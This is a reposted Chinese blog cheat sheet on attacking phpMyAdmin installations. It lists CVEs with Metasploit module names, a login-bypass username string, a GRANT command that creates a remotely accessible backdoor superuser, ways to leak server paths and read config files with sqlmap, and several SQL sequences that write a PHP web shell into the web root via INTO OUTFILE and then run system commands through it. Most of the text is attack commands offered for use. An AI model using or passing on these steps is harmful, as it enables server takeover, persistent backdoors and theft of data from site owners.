【转载】phpmyadmin漏洞利用总结
时间:2016-11-27 16:37 来源:转载 作者:匿名投稿 点击:次
一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3
概述:PhpMyAdmin存在PREG_REPLACE_EVAL漏洞
利用模块:exploit/multi/http/phpmyadmin_preg_replace
CVE: CVE-2013-3238
二: 影响版本:phpMyAdmin v3.5.2.2
概述:PhpMyAdmin存在server_sync.php 后门漏洞
利用模块:exploit/multi/http/phpmyadmin_3522_backdoor
CVE: CVE-2012-5159
三: 影响版本: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1;
概述:PhpMyAdmin配置文件/config/config.inc.php存在命令执行
利用模块:exploit/unix/webapp/phpmyadmin_config
CVE: CVE-2009-1151
4. 影响版本:phpmyadmin 2.11.3--phpmyadmin 2.11.4利用方式:直接在phpmyadmin的用户名内填入: 密码空
'localhost'@'@"
复制代码5. phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 phpMyAdmin 3.x Swekey远程代码注入攻击
6. phpmyadmin 2.80 反序列 lfi、 rfi包含 漏洞文件 ss
phpmyadmin一句话开启外链mysql :添加超级用户guetsec密码ooxx并且允许外连
GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
phpmyadmin 暴绝对路径:
1. 用Web路径自动盲爆工具 V2.0 乌云内测(带字典).rar
2.扫phpinfo.php info.php php.php test.php等等
3. 上传图片 超长文件名!
4.phpmyadmin构造xml上传暴路径
5.phpmyadmin读取系统文件cmd爆路径!
6.phpmyadmin读取 iis6,iis7配置文件 读取apache Nginx 配置文件!
windows2003 iis6配置文件所在位置C:\Windows/system32\inetsrv\metabase.xml
win2008/2012 iis7.5 在这个文件C:\Windows\System32\inetsrv\config\applicationHost.config
apache配置:/etc/httpd/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
Nginx配置 /etc/nginx/conf.d/vhost.conf
/usr/local/etc/nginx/nginx.conf
穿山甲只能读一部分, 上sqlmap
sqlmap -u url --file-read 'C:\Windows\System32\inetsrv\config\applicationHost.config'
phpmyadmin 拿shell
:
账号还有密码
root 密码
第一种
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('');
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/darkmoon.php';
DROP TABLE IF EXISTS `darkmoon`;
第二种方法
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES('');
select darkmoon from moon into outfile 'd:/wamp/www/darkmoon2.php';
Drop TABLE IF EXISTS moon;
第三种方法:
select ''INTO OUTFILE 'd:/wamp/www/darkmoon3.php'
第四种方法
select '' INTO OUTFILE 'd:/wamp/www/darkmoon4.php'
127.0.0.1/darkmoon4.php?cmd=net user
原文地址:http://blog.sina.com.cn/s/blog_913e8a2a0102wbr5.html
|